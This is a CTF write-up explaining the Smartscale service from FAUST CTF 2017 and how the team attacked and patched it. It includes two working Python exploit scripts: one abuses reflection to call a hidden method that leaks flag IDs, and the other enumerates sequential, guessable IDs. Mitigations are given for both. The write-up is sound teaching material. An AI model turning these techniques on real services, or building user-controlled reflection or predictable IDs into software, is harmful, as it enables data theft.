Saarsec

Schwenk and pwn

FAUST CTF 2017 Smartscale Writeup

Having achieved first blood for this service in FAUST CTF 2017, we, the Saarsec team and in particular the subteam that cracked this service, were given the opportunity to provide a write-up for the Smartscale challenge. In this write-up we explain how Smartscale works and how to attack and defend it.

General

Smartscale is a classical Java service that can be started from the command line, reads its commands from standard in and responds to standard out. However, what makes Smartscale particularly interesting is the way it is compiled and executed. Even though it is compiled from a regular Java project with a main method and several classes, it is compiled for Android’s register-based Dalvik Virtual Machine using the dx tool and then executed in the new Android Runtime (ART) that was compiled for x86.

Compilation Toolchain

In general, Android apps are written in Java (or Kotlin) and compiled to .class files using a regular Java compiler. Afterwards, the code is transformed to Android’s own bytecode representation (.dex files) using the dx tool. With the introduction of ART in Android 5, the Android Runtime additionally decides whether an application's Dalvik bytecode is interpreted or compiled down to native code using the new on-device compiler dex2oat. In our case, the service binary is a dex bytecode file that is executed with a version of ART that is compiled for x86.

Service Execution

Due to a port-activated socket, each connection to the service port 31337 triggered an execution of the service bytecode within art:

art/bin/art -cp SmartScale.dex ninja.faust.smartscale.SmartScale data/

While art/ stores all files necessary for the Android Runtime to work on x86 (binaries, libraries, …), the data/ directory stores the flags.

Analysis

In contrast to native binaries, Android bytecode is very high level, so it can be decompiled easily using readily available tools. In our case, we used the jadx decompiler to decompile it to Java, exported it as a gradle project and imported it into IntelliJ. Fortunately, most of the code could be decompiled successfully.

Functionality

On an abstract level, Smartscale acts as a key-value-store that stores flags under IDs that are returned and retrieves the flag again given the corresponding flag ID. For the communication, data is transmitted via json objects.

SmartScale is the main class and entry point into the program. It reads the json input from standard in and writes the output to standard out. It differentiates between two modes of operation, depending on the request json: storage and retrieval.

Storage

When the gameserver stores a flag, a json object of the following format is transmitted:

{
	"action": "store",
	"data": {
		"size": 2.11,
		"fat_quotient": 0.49,
		"weight": 109.77,
		"comment": "FAUST_WSg6gA8ElaRHygAAAACJm5riKb4LikA5",
		"tasks": ["task1", "task2"]
	}
}

While size, weight and the like explain why the service is called Smartscale, the more interesting keys are comment and tasks. The comments appended to the measurements are used by the gameserver to transport the flags to the service. The hash (visible in the retrieval response) is a checksum over the weight and the comment. tasks, however, is the most interesting key: it carries a list of names of methods in the Data class, the class that wraps the json objects and takes care of marshalling them. Each method named in the tasks list is invoked via reflection, which hints at the first vulnerability. When the gameserver uses the service, this value is empty and defaults to calculateBMI, which does exactly that: it calculates the BMI from the values of the json object. Afterwards, a new identifier is created and used as the file name under which the json object is persisted, before it is returned to the sender as the flag ID.
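To make the request format concrete, here is a minimal Python sketch that builds a storage request. The helper name build_store_request is ours and not part of the service, and leaving out the tasks key entirely is an assumption based on the description above (the gameserver sends no tasks of its own).

```python
import json


def build_store_request(size, weight, fat_quotient, comment, tasks=None):
    """Serialize a 'store' request as a single line of JSON."""
    data = {
        "size": size,
        "fat_quotient": fat_quotient,
        "weight": weight,
        "comment": comment,
    }
    # Only include 'tasks' when the caller asks for specific methods.
    if tasks is not None:
        data["tasks"] = list(tasks)
    return json.dumps({"action": "store", "data": data})


if __name__ == "__main__":
    print(build_store_request(2.11, 109.77, 0.49, "Hello World",
                              tasks=["calculateBMI"]))
```

Since the service reads from standard in, the resulting string is sent followed by a newline.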

Retrieval

For retrieving flags, the following json format is used:

{
	"action": "retrieve",
	"flag_id": <string>
}

Given a flag ID, the service searches for a file with this name and, if successful, reads the stored json object and returns it in a response json of the following form:

{
	"status": "ok",
	"data": {
		"size": 2.11,
		"fat_quotient": 0.49,
		"bmi": 24.655780418229,
		"weight": 109.77,
		"comment": "FAUST_WSg6gA8ElaRHygAAAACJm5riKb4LikA5",
		"hash": "2281812b439641f374fcfb022c4956b7"
	}
}
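For an attacker, the only relevant part of this response is the comment. The following sketch pulls flag-looking strings out of one response line. The regular expression is an assumption derived solely from the sample flag shown above, and extract_flags is a hypothetical helper name.

```python
import json
import re

# Assumed flag shape: "FAUST_" followed by 32 base64 characters,
# inferred only from the sample flag in this write-up.
FLAG_RE = re.compile(r"FAUST_[A-Za-z0-9+/]{32}")


def extract_flags(response_line):
    """Return all flag-looking strings found in the 'comment' field."""
    try:
        response = json.loads(response_line)
    except ValueError:
        return []
    if not isinstance(response, dict) or response.get("status") != "ok":
        return []
    data = response.get("data")
    comment = data.get("comment") if isinstance(data, dict) else None
    if not isinstance(comment, str):
        return []
    return FLAG_RE.findall(comment)
```

Anything that is not valid json, or that does not report the status ok, simply yields an empty list, which keeps a bulk exploit loop from crashing on a single bad response.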

Vulnerabilities

Magic

As already mentioned, by providing method names under the tasks key when storing data, an attacker can invoke methods of the Data class via reflection. In particular, there is a very interesting method called magic that is never invoked in the regular code but is nevertheless present in the bytecode. If invoked, it collects and returns recent flag IDs, which we can then use to obtain flags.
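The pattern is easy to model outside of Java. The following Python sketch is only an analogy: the method bodies and the run_tasks helper are hypothetical, and only the names Data, calculateBMI, magic and tasks come from the service. It shows why dispatching on attacker-supplied method names exposes every method of the class, including ones the regular code never calls.

```python
class Data:
    """Toy stand-in for the service's Data class (bodies are hypothetical)."""

    def __init__(self, weight, size, recent_ids):
        self.weight = weight
        self.size = size
        self._recent_ids = recent_ids
        self.result = {}

    def calculateBMI(self):
        # BMI = weight / size^2, consistent with the sample response above.
        self.result["bmi"] = self.weight / (self.size ** 2)

    def magic(self):
        # Never called by regular code, but reachable by name.
        self.result["flag_ids"] = list(self._recent_ids)


def run_tasks(data, tasks):
    """Invoke each named method, mirroring the reflective dispatch."""
    for name in tasks or ["calculateBMI"]:
        getattr(data, name)()
    return data.result
```

With an empty task list only calculateBMI runs, whereas a task list of ["magic"] returns the recent flag IDs instead.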

Exploit

The exploit idea is the following: First, we send a storage request with the magic task. Second, we use the returned list of flag IDs to request the json objects that carry the flags under the comment key. The following python code depicts a simplified sample exploit:

import json
import sys

from pwn import *

HOST = sys.argv[1]
PORT = 31337

# Store a dummy measurement, but ask the service to run the hidden magic task.
request = {
    'action': 'store',
    'data': {
        'weight': 99.99,
        'size': 1.62,
        'fat_quotient': 0.10,
        'comment': 'Hello World',
        'tasks': ['magic'],
    },
}

r = remote(HOST, PORT)
r.sendline(json.dumps(request).encode())
response = json.loads(r.recvline(timeout=2))
r.close()

# Retrieve each leaked flag ID over a fresh connection.
for fid in response['flag_ids']:
    r2 = remote(HOST, PORT)
    r2.sendline(json.dumps({'action': 'retrieve', 'flag_id': fid}).encode())
    print(r2.recvline(timeout=2))
    r2.close()

It basically creates a new connection for each obtained flag ID, then retrieves and prints the response, which includes the flag.

Mitigation

There are several ways to patch this vulnerability. While it is straightforward to nop out the magic function, we suggest replacing the whole reflection code with a hardcoded invocation of calculateBMI. Why? Because reflection is overkill in the first place when all that needs to be executed is a known, accessible method. And in addition, reflection is evil, right?

This can be done by, e.g., disassembling the code to smali using the well-known apktool. smali is a more readable representation of dex bytecode and allows for easy modification and recompilation without having to deal with offsets. For this challenge, we used the Bytecode Viewer tool, which combines multiple decompilers but can also display the smali version of the code. In addition, it allows for modifications and can export the result.

Guessable Flag IDs

The second vulnerability is based on the fact that flag IDs are easily guessable. The following decompiled code shows how IDs are generated:

private static String generateId() {
    File[] listFiles = DIR.listFiles();
    if (listFiles != null) {
        Arrays.sort(listFiles);
        int length = listFiles.length - 1;
        while (length >= 0) {
            try {
                return Long.toHexString(Long.parseLong(listFiles[length].getName(), 16) + 10);
            } catch (Exception e) {
                length--;
            }
        }
    }
    return Long.toHexString(428381535063902626L);
}

DIR is the flag storage directory, in our case data/.
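To see how predictable the resulting IDs are, the logic can be ported to Python. This is a sketch rather than an exact port: it takes a list of file names instead of reading a directory, and Python's int(name, 16) is slightly more lenient than Long.parseLong (for example, it accepts a 0x prefix). The neighbours helper is ours.

```python
DEFAULT_ID = 428381535063902626  # fallback constant from the decompiled code


def generate_id(existing_names):
    """Python port of generateId, taking file names instead of a directory."""
    # Like the Java code, start from the lexicographically largest name
    # and skip every name that does not parse as a hex number.
    for name in sorted(existing_names, reverse=True):
        try:
            return format(int(name, 16) + 10, "x")
        except ValueError:
            continue
    return format(DEFAULT_ID, "x")


def neighbours(flag_id, count):
    """IDs that were handed out just before flag_id."""
    base = int(flag_id, 16)
    return [format(base - 10 * i, "x") for i in range(1, count + 1)]
```

For instance, with the files ff and notes.txt in the directory, the next ID is 109 (0xff + 10), and neighbours("109", 2) yields ff and f5.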

Exploit

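Based on this, we can easily guess flag IDs. In particular, it is straightforward to enumerate them: we store an entry of our own to learn the most recent ID and then repeatedly subtract 10 to reach the IDs handed out before it. This leads us to our second exploit: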

import json
import sys

from pwn import *

HOST = sys.argv[1]
PORT = 31337

# Store a dummy measurement just to learn the most recent flag ID.
request = {
    'action': 'store',
    'data': {
        'weight': 12.13,
        'size': 1.78,
        'fat_quotient': 0.99,
        'comment': 'Hello World',
    },
}

r = remote(HOST, PORT)
r.sendline(json.dumps(request).encode())
data_read = r.recvline(timeout=2)
r.close()
print(data_read)

fid = int(json.loads(data_read)['flag_id'], 16)
print('flagId:', fid)

# Walk backwards in steps of 10 to reach the IDs handed out before ours.
for i in range(0, 30):
    fid_str = format(fid - (10 * i), 'x')
    tmp = {'action': 'retrieve', 'flag_id': fid_str}

    r2 = remote(HOST, PORT)
    print(json.dumps(tmp))
    r2.sendline(json.dumps(tmp).encode())
    print(r2.recvline(timeout=2))
    r2.close()

Mitigation

In general, replacing the current implementation of generateId with a non-guessable variant does the job. We, for example, decided to go for SHA-256 hashing a (secure) random value. As the flag ID is returned to the client, we do not even have to adhere to the current flag ID format or size. The gameserver will happily use whatever we provide it with, hence we are completely free to change the method at will.
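The actual patch has to be applied to the service's Java/smali code and is not reproduced here. As an illustration of the idea only, a Python equivalent could look like the following sketch; the choice of 32 random bytes is our assumption.

```python
import hashlib
import secrets


def generate_id():
    """Return an unguessable flag ID: SHA-256 over 32 bytes of CSPRNG output."""
    return hashlib.sha256(secrets.token_bytes(32)).hexdigest()


if __name__ == "__main__":
    print(generate_id())
```

Strictly speaking, the hash adds no security on top of the random bytes themselves; it merely yields a fixed-length hex string. What matters is that the random source is cryptographically secure.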

Noteworthy

There are some more interesting facts about the smartscale challenge that we did not yet discuss.

AwesomeHash

Smartscale ships with its own dedicated hash function that is used to compute the checksums. Since the hash code could not be decompiled completely and it is very hard to get crypto implementations right, there is probably something wrong with the implementation. However, as the checksum is needed for neither request type, we completely ignored it during the CTF. At this point, we invite the interested reader to have a look herself =)

Hello.{java, class, dex, oat}

Hidden in the art/ folder, there are four files called Hello, each representing a different stage of compilation. There are several possible reasons why they are there; here are some guesses:

  1. They indicate the toolchain used to compile and run the code in ART. This would mean that they are a hint for players not experienced with Android and ART on what happens to a Java source file.
  2. They indicate a vulnerability. We actually checked for this. Because one of the ideas was that code might be added in one of the compilers (this idea might be inspired by one of the papers of one of this write-up’s authors ;-) ), we inspected the source code, the class and dex bytecode and also the compiled oat file. For the latter, the oatdump tool reveals that it was actually compiled from the corresponding Hello.dex file with no additional methods and no extra or changed code (at least none that we found). In general, all four files seem to correspond to the same functionality.
  3. They were a simple test case for ART running on x86 and were not removed by the service’s authors. This is actually the most probable one since the code is extremely simplistic: it just prints Hello!

Even though we are pretty confident there is no hidden code in there, we are still not completely sure why those files are there, although 3. seems the most probable explanation. I guess this is something we will ask the organizers directly.

Reproducibility

In case you want to play around with Smartscale yourself, it is straightforward to use it locally. There is no need for port-activated sockets; you can start the service directly from your python scripts. For example, by replacing the remote tube with process('./art/bin/art -cp SmartScale.dex ninja.faust.smartscale.SmartScale data/', shell=True), the exploits described above can be fired against the service directly.
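If pwntools is not at hand, the same idea works with Python's standard library alone. The sketch below starts one service process per request, just like the socket does. It assumes that it is run from the service directory and that the service answers with a single line, as the exploits above suggest; query_local is a hypothetical helper name.

```python
import json
import subprocess

# Command line taken from the text above; paths are relative to the
# service directory.
ART_CMD = ["./art/bin/art", "-cp", "SmartScale.dex",
           "ninja.faust.smartscale.SmartScale", "data/"]


def query_local(request, cmd=ART_CMD, timeout=10):
    """Start one service process, send one request, return the first output line."""
    proc = subprocess.run(cmd, input=json.dumps(request) + "\n",
                          capture_output=True, text=True, timeout=timeout)
    lines = proc.stdout.splitlines()
    return lines[0] if lines else ""
```

A call such as query_local({"action": "retrieve", "flag_id": "ff"}) then returns the raw json line printed by the service, or an empty string if it printed nothing.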

Final Remarks

While FAUST CTF 2017 had very interesting services in general, this particular challenge was very special because it was executed in an x86 version of the Android Runtime, yet it was not an Android app but a regular Java application that was just compiled for Android. As a result, pwning and fixing the service requires knowing not only Java but also the Android toolchain, since patching is far from straightforward if you do not know about, e.g., smali. If you, however, are by chance an Android developer or even a researcher in this field (guilty =) ), this service was perfectly suited for you.

In conclusion, we had a lot of fun reading through the code, attacking and patching it, and it was great to finally be able to also apply Android skills to a CTF challenge. Especially for attack-defense-CTFs, this is a rarity. Cheers at this point to our friends from FAUST, well done!